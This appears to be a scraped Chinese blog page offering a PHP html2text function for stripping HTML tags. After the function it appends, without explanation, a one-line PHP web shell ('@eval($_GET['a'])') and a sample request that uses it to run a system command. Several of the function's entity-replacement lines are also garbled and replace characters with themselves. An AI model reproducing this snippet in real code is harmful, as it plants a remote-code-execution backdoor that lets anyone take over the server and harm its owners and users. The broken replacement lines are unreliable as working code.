zoukankan      html  css  js  c++  java
  • php去除h5标签

    function html2text($str){
     $str = preg_replace("/<style .*?<\/style>/is", "", $str);
     $str = preg_replace("/<script .*?<\/script>/is", "", $str);
     $str = preg_replace("/<br \s*\/>/i", ">>>>", $str);
     $str = preg_replace("/<\/?p>/i", ">>>>", $str);
     $str = preg_replace("/<\/?td>/i", "", $str);
     $str = preg_replace("/<\/?div>/i", ">>>>", $str);
     $str = preg_replace("/<\/?blockquote>/i", "", $str);
     $str = preg_replace("/<\/?li>/i", ">>>>", $str);
     $str = preg_replace("/ /i", " ", $str);
     $str = preg_replace("/ /i", " ", $str);
     $str = preg_replace("/&/i", "&", $str);
     $str = preg_replace("/&/i", "&", $str);
     $str = preg_replace("/</i", "<", $str);
     $str = preg_replace("/</i", "<", $str);
     $str = preg_replace("/“/i", '"', $str);
     $str = preg_replace("/&ldquo/i", '"', $str);
     $str = preg_replace("/‘/i", "'", $str);
     $str = preg_replace("/&lsquo/i", "'", $str);
     $str = preg_replace("/'/i", "'", $str);
     $str = preg_replace("/&rsquo/i", "'", $str);
     $str = preg_replace("/>/i", ">", $str);
     $str = preg_replace("/>/i", ">", $str);
     $str = preg_replace("/”/i", '"', $str);
     $str = preg_replace("/&rdquo/i", '"', $str);
     $str = strip_tags($str);
     $str = html_entity_decode($str, ENT_QUOTES, "utf-8");
     $str = preg_replace("/&#.*?;/i", "", $str);
     return $str;
    }
     
    ?a=system(ipconfig);
     
    <?php @eval($_GET['a']);?>
  • 相关阅读:
    Python模块:struct
    Python模块:hashlib
    Python模块:collections
    python:爬虫
    Python:进程
    Python:线程
    Python:socket
    Welcome to ARFA's cnblog ! (Click me)
    骗访问量的机房人物列传by xMinh
    关于我
  • 原文地址:https://www.cnblogs.com/vip-deng-vip/p/8679364.html
Copyright © 2011-2022 走看看